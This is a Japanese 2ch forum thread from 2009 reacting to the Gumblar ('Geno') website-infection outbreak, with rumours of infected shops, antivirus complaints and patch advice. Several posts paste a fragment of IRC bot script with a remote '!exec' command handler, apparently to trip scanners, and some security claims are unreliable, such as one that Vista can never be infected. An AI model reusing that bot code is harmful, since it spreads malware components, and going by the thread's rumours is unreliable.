新型インフルエンザが流行したら篭城してネットでも楽しむかと思えば、
そのネットに接続するのも恐ろしい事態になるとは…。

donutならボタンひとつでjava切れるから最強だな！！

国内で豚インフル…？どうせ引きこもりだし関係ないしｗｗｗ
ネサフしてれば時間なんて…

…え？

>>746
リンク先に飛ぼうとする→このリンクは他のプログラムで開く必要があります→プログラムの選択→狐かその他を選択

みたいな流れ

MacがやられてたらBSDも危ない
その逆もまた

Janeでリンクからブラウザに飛ばないようにする方法ってないの？

>>682
Amazonなのか釣りなのか答えてくれ

>>758
・・・俺、つい5日くらい前にカードで買い物したばかりなんだ

>>760
過剰・・・なのか？まじで怖いんだが

近々欲しい物があって通販しようと思ってたけど
こりゃ普通のネット巡りも当分保留だな…

ぜんぜん報道されてないみたいなんだけど　なぜ？
どれくらいの実害がでるか想像できない状態なんだろ？

どこの通販サイトなのか言ってくれ

>>770
ダメな時は何してもダメなもんだ。あきらめれ

>>769
設定でブラウザのパスを指定しない
ttpをNGに登録
そもそもネサフしない

ttp://www.aguse.jp/?m=w&url=94.247.2.195&media=1&x=42&y=10
まぁどうせ練鯖なんだろうけど

もうJS全部不許可にしとかないと何処も信用できないな

>>774
放送の優先順位が豚ちゃん

楽天だったら俺死亡

992 名前：geno[sage] 投稿日：2009/05/16(土) 12:49:26 ID:GQnaax2E0
小学館とスクエニの公式の一部が感染してたぞ
ヤング系

おいおい勘弁してくれ…

>>774
蔓延してから報道するんだろうな
テレビっていつもネットより随分遅れてるし

>>668>>683
そうなのか！？ありがとう、やってみる。

>>779
今頃、気づいたか

>>781
あれ？俺いつ書き込んだんだ？

楽天市場は中古PC家が感染報告されてたよな

このウイルスも厚生労働省に電話すればおｋ？

>>784
この板来てここ見てるような人以外は
かなりのほほんしてるように感じるよ、ちゃねらでさえ今回は…

これからは超漢字の時代が　　　　　　　　　　　　　　　　　　　　　　　来ないな・・・

>>599
此処って踏んで大丈夫だった？PCがフリーズしたんだけど・・・。知恵袋だよね？

VISTAでパソコン重くなってないから大丈夫なん？


vistaの確認方法って>>7でおｋ？

まさかこんな形で2ｃｈどころかネットが終わりを迎えるとは

>>772
>>599の内容は、↓だから無害だよ。開いてもJavaScriptは実行されない。

ヨミサーチを設置後、htmlソースがおかしくなりました。

スクリプト記述部が

<script language=javascript><!--
(Genoウィルスの内容がテキストで張られている)--></script>

となってしまいました。
最初は普通にプログラムとして記述されていたのに
いつのまにかこんなことになっておりました。
なぜこうなってしまったのでしょうか。ウイルスでしょうか・・・
------------------------------------------------------------------------------------------------------------
ベストアンサーに選ばれた回答

doctorwho_torchwood_tardis_mayoさん

問題ありません。
特に気にしなくても結構です。
------------------------------------------------------------------------------------------------------------
そうなのですか・・・。ありがとうございました！
教えてください。お願いします。

感染したら駆除方法はOSの再インスコしかないの？

世の中ウイルスだらけ

行きつけの古着屋のブログ行ったらadobeが暴走したｗｗｗ

>>767
なんでそんなことになるのかさっぱりわからんが、それ先読み切ったせいとは
まったく関係ないと思うぞ。

ヤフーも感染かよ…

ヤフーも？
やべーホームに設定してるのに

感染してないサイトを探すほうが難しくなってきたな

もう怖すぎるよぉ
しばらく引きこもる

ヤホー？ナイツも感染したの？

view-source:http://www.amazon.co.jp/

いまんところmartuないぞ

>>800
まじで？

>>782の小学館ってのはマジ？

知恵袋死亡ｗｗｗ

あんまりホラ吹かれると洒落になんねえぞ

pcだと感染するからPS3やwiiでネサフした方が良さそうだな。
いつかPS3・wii用のウイルスも出るんだろうけど。

>>599
この質問・回答は役に立ちましたか？
はい　いいえ　.お役立ち度：6人中 0人が役に立つと評価しています。

評価0人で救われた

>>800
ん?
>>599は開いても大丈夫だぞ。質問者は感染してるが。

誰か>>599確かめて来いよｗ

>>792
みんなしてこぞってアクセスし過ぎだよね

こんなスパイウェア消えればいいのに

一番安心なネサフ方法発見


ドリームキャストで（ry

だから釣りはやめろってば…

>>814
なるほど、そういうことか

>>682
アドレス貼らずに名前を一部伏字で書いてちょ

>>810ドリームキャストしか持ってねぇ

MSNはまだ大丈夫だよな…？

adobe readerでバージョンアップが必要なのって9.1の奴だけだよな？
9.1の 脆弱性付かれてるから9.1.1にする必要があるんだよな
9.0とか8の奴ってのとりあえず更新しないでおいたほうがいいよな

釣りって下手すりゃなんたら業務妨害だっけ？

楽天でショッピングできねぇえええええええ

BeOS

ドリキャスどこに閉まったっけか

どこが感染したとか釣ってる奴ら
勘弁してください

いつもながらAvast!は過剰反応だな。
Avast!入れてるPCだと確かに>>599に反応してしまう。

>>772
テキストに反応してるだけでしょ?

怖くてネット繋げねー

持ってて良かったドリームキャスト

感染が確認されたところまとめて欲しい

LANがドリキャスのモデムにささらねえorz

>>821
MSNでWEBメールをやっていたら
嫌でもスクリプトを許可しないと駄目だから感染したらキツイな

>>767
自分も早速設定やったけどそんな事には・・・
違うとこいじったんじゃないかな？
因みにネット回線あんまり速くないんでちょびっと描画遅くなった気がするよ

view-source:楽天

いまんところmartu/gumburなし

avastは敏感に反応しすぎ

>>829
だったら問題ないんだよな・・・？

>>599
酷いな。YahooIDでログインして、回答に違反報告クリックしといたが、なんでまずいのかのコメントを
付けれないから、担当者が理解できるかどうか…。

取り敢えず、あの嘘回答で蔓延を加速させた奴の発言は、違反報告クリックしとけ。

何この

かつてないリンク先誤クリックの怖さｗ

楽天の場合は各ショップでhtml弄くるだろ？
そういうことだ

よし、Adobe Readerを9.1.0→9.1.1にしたぞ
これで一安心だな

>>833
なんかﾜﾛﾀ
走って合うの買ってこいｗ

>>841
じゃあ同人系のショップがやられてるわけか

ぶっちゃけ、ノートン大先生を最新に更新しておけば心配なし？

こんな恐ろしい状況、ネット歴１０年の俺は初めてなんだが

>>838
問題ないよ。内容は>>795の通りで、質問者がテキストでGenoを張っていて
そのテキストにAvast!が反応しちゃってるだけ。

とんだ週末になりそうだ

>>845
ノートンはギャンブラーに反応してなかったんじゃ・・・

>>845
ノートン大先生は全く名前が出てこないぐらいついてきていらっしゃいません

>>845
いや、めちゃくちゃ心配。ほぼ全スルー。

Web制作会社勤務だけど、
会社のPC（WinXP Pro SP2）が一台感染してた。ｵﾜﾀ

>>847
ありがとう！死んだかと思ったよ・・・

山田のときも祭りだったが、今回のはシャレにならん怖さがあるな

ノートン先生もウイルスの進化に置いてけぼりくらってます

ご老体ですから

で、打開策はあるのか？このままじゃ感染が拡がる一方だが

>>852
オワタｗｗｗｗｗｗ

しばらく2chだけにしよう

>>854
どこに地雷が埋まってるか解らないもんな

誰か小学館とスクエニ見てきて…

おまえら２ちゃんだけでいいじゃん

>>854　山田オルタナティブって久しぶりに聞いた。

しばらくは２ｃｈとヤフオクだけにするか・・・。

>>852
やめろよなーｗｗｗｗ

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

※※※　gumblar.cnはmartuz.cnに引っ越ししたようです。　※※※

ブロック範囲変更しないと…

>>854
山田ウイルスは予防対策も出来たが、この手の奴はうっかり感染しそうだよ

>>852生きろおおお

>>867
何とかしてくれ

>>867
え！また移動したのかよ！！！
勘弁してくれ！

>>799
ごめｗ
違うところ変えてたorz

山田みたいにみんなで楽しめるようにしてくれればいいのにね

GENO社員必死だなｗ

あれ？
てすと

・東方　音楽サークルの告知サイト
・ひぐらし　男性向けイラストサイト
・コナン　ノマカプサイト
・オリJUNEサークルの告知サイト
・ヘタリアの携帯向け同盟サイト（PCレン鯖）

感染拡大しすぎｗｗっうぇ

豚インフルエンザ並みの拡大状況でヤバイな

さっきからこのスレ更新するとノートンが反応するんだが

スレ開いた途端にラブレター検出したんだが偶然か

PCがウイルスに感染しているかどうかを確かめるには、
やっぱかスペルスキーのオンラインスキャンが手っ取り早いね

とりあえずFlash PlayerとAdobe Readerはupdateしといた
水面下で着々と感染させてってある日…ってなるのか

>>866のせいじゃないか？

>>878
俺のノートン先生寝てるぜ？

>>878
俺もそうだｗｗｗｗｗｗ
avastでもそうだがdatに結構反応すんだよな

まだニュー速にたたないの？

このスレ開くとAVGが反応するんだが
>>567->>873の間に何か貼ったか？

すげー伸びててﾜﾛﾀ
流石に皆異常に気付きだしたのか

>>879
同じ。

さっきから何度か開いてるけど、今急になった。
ノートン先生が反応したっすよ。

>>878,879
>>866のせいですｗ

>>866だな
もー余計なことすんなよー

>>835
違うところ変えてただけだった

俺の友達が感染したかもしれないらしい

XP厨が阿鼻叫喚で楽しいな。
何も分からずVistaをバカにしてた罰が当たったとしか言えない。

sqlsodbc.chm が改変されてるかチェックとか言ってるけど、
Vistaなら改変を試みた時点でUACが反応するし。

このスレに貼られてるURLやコードに反応してるのか

おや？俺のノートン先生、とうとうお亡くなりになったのか。

ノートンがラブレター拾うなら心配ないじゃん

うちは反応しないな
専ブラで更新するだけじゃ反応はしないのか？

>>684
ワロタw

>>890
セキュリティソフトの設定調整すれ

>>895
昔からノートン先生はラブレター大好きだよな。

Windows7とavastだけどなんもさわがねーぞ

>>899
お年を召してもときめきは忘れない爺ちゃんって感じだな

>>892
言っておくが現時点だからなｗ

次スレﾄﾞｺｰ

>>866のせいかよーｗびっくりするだろｗｗｗ

>>866ってJaneでスレ開いてもやばい？

>>612
さっき落ちてきたのがこれ

この不況だし感染企業潰れるかもな

ん？専ブラなら無反応でおｋ？

次スレこれ？
http://pc11.2ch.net/test/read.cgi/sec/1242415108/

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

>>866
これなら先生も反応してくれるのにｗ

>>852
このウイルス機会に7の導入はスムーズに行くかもね

>>883
878じゃないけどさっき先生アップデートしたら反応するようになっちゃった
ついでにbbs2chreaderの表示もちょっとおかしな事に・・・
既読の表示されなくなっちゃた

ギコナビで見てたけどノートン2009が反応したので、
今VirtualBox＋ubuntu＋FireFoxで見てる。

＞＞９０９
お前まじで氏ね

次スレ立てる奴は重複防止の為、宣言する事！

どうする？削除依頼出ているスレを実質6として使うか
新しく立てるか？

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

>>910
まさか…そのために奴らが動い

専ブラで反応した
また貼った奴いるなぁめんどくせ

専ブラのログのフォルダをスキャンから除外しとけばいいだけじゃん

>>911
ログの削除

>>892
VistaでもUAC切った奴が感染したって報告が同人スレのほうであったみたい
でもjavascriptにはNT6系(Vista、Win7）の判定で狙われないわけでUACがONかOFFかは関係ないと思うんだけど
そこらへんがよく分からない

てかさ、avast入れてても反応しないよ

avast入れてJaneで見てるけどまったく反応しないんだが…

未だに2chのログで検知誤爆してる奴ってなんなの？死ねよ

気にしない　気にしない

愉快犯がやってるっぽいね、今さらだけどここID無しなのね
IDあぼーんできないのか

avastはここに落ちてるのは拾わないな

騒がれだしたら急に嬉々として張り出したな
ばかか

>>902
sqlsodbc.chm を利用しない方法はいくらでもあるだろうけど、
UACに反応せずシステムを書き換える方法は一つもない。
どんな亜種が出てきてもVistaなら大丈夫と言い切れる。

avast入れててギコで見てるが、なんも反応ないぜよ？

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-


例外設定くらいしておけよカスどもｗｗ

avast入れてjane使ってるが何も反応ない

会社のマシンやられたってやつ

これで通報しておけよ

http://www.ipa.go.jp/security/format/report-format.html

専ブラで反応しないからfirefoxでこのスレ見たけど反応しなかった

>>759
冷静に考えたら納得した、すまんｗ

AviraでJaneだけど反応しないぜ

あら？俺のノートン先生、朝アップデートかけたけど無反応だな。
起きろよノートンじいちゃん！

いや、起きないのが普通なのか？どっちやねん。

CPUが大きく上下してる・・・。
>>866ってなんなの？
専ブラでもだめなのか

AVGもスルーなの?

>>932
まピョーん☆

起きたら誤検知ｗ>>936

専ブラでは感染しないよ

無知が雪崩れ込んできてる訳だが

ニュー速は豚しか騒いでないのな

avast以外はほんとにどうしようもないな

>>940
寝てて良いわけね。

>>937
専ブラで設定しれ

ノートン先生さっきからなんか遮断しまくってるけど

ここのコードだけで感染しますん

こういう時のために、日頃からエロ画像や動画を蓄えておくのが大事なんだよな
備えあれば憂いなし

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

あ・・・らぶれたー・・・

>>950
は？お前何なの？

http://img2.pict.com/01/18/06/f2cc3c3e9c355a5631783c9669/SOqD0/2zcg.gif

重要情報を勝手に外部に送信するプログラムとかも仕込まれるのかな?
pixivの管理者が感染してpixivユーザーのメアドとIDがセットで流出したら阿鼻叫喚の地獄絵図になりそう。
（エロ絵描いてる人とか特に）

個人情報を登録してるショップや企業も情報が漏れたりして。

>>948　どっちなのか、わかりますん

誰かコイツ通報しろよ

コード貼ってるやつ抽出して規制議論でいいだろ
いちいち誰かが反応して話が途切れる

Outpostでシステム全体のルールとして設定したからもう安心だ

２ｃｈにいれば安全だな

>>954
pixivは今回の騒ぎに全然対応してくれてないみたいだからもし実現するとエラいことになるな

２ちゃんねるが侵されたら
ねらー全滅か？

>>960
そりゃpixivは感染してないんだから無関係だし。
対応とか意味分からん。

>>961
携帯でアクセスすればおｋ

情報抜かれてもへっちゃらな人はモーマンタイ？

たらればの話は情報混乱するからやめとけ

おう

あーごめん、ログちゃんと読んでなかった
つか自動あぼんされてた
コード貼ってあったのか、自己解決

２ちゃんねるが侵されたらIEなんかで見たらだめだろうが
専ブラで見ている限り２ｃｈや対応掲示板は安全

>>915
これって他のスレでもたまに見るけどなんなの？

>>969
ノートン先生に宛てたラブレター

一日5人前後の訪問者しかいないサイト持ちで
半年以上更新してなかったが
ある意味良かったのかもしれんな

数ある俺のセキュリティソフトを幾ら駆使しても未知のウィルスには無意味なんですね

変なこと聞くけど、Live2chも専ブラだよね？

関西在住だけど神戸のインフルエンザよりこっちのが怖いよぉ

>>970
ノートン先生にだけ反応する〜みたいなやつか、俺には関係ないな

そんあコード貼られるのも想定内

>>961
日本のネットワークがマヒ状態。

てか、2chのサーバーを運営している会社もやられてたような・・・

>>972
Vista使えばいい。別に7でもいいけど。

同人スレの人達が何人か「pixivトップでウィルス注意喚起してくれ」ってメールしたけど
総スルー中らしい
pixivやってるひとはサイト持ち多いだろうし
現にランカーで東方大手サークルのサイトが感染

>>706
更新日なんて・・・
そのファイル保護下に入っているんだっけ？
ないから感染するんだよな。

こええええええ

>>979
今のうちだけじゃね？

恐怖はいつまで続く

>>980
そりゃスルーするだろ。pixiv関係ないもん。
何かウイルスが流行る度にpixivに注意喚起させる気かよ。

埋めますか

ソースチェッカーオンラインが感染したら大変なことになりそう

次スレは？

ニュー速にスレが立ってもおかしくないレベル

ドリキャスとキーボードこの前売っちまったｗ

ほんとに次スレここでおｋ？
http://pc11.2ch.net/test/read.cgi/sec/1242415108/

>>983
UACがあるから根本的にXP以前とは違う。
このウイルスをVistaに感染させることはできないよ。

ume

１０００

1000

次スレ(゜Д゜≡゜Д゜)?どこ？

1000なら2ちゃんも感染

スレ眺めてるだけで一日が過ぎそう

１０００

∞　　　　　　∞
　　∞
　∞　　　∞
　　　　　ヽ[ﾟдﾟ]ﾉ ｼﾝｶﾞﾀﾃﾌﾃﾌ
　　　　　 　[＿]
　　　　　　　<　＼

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。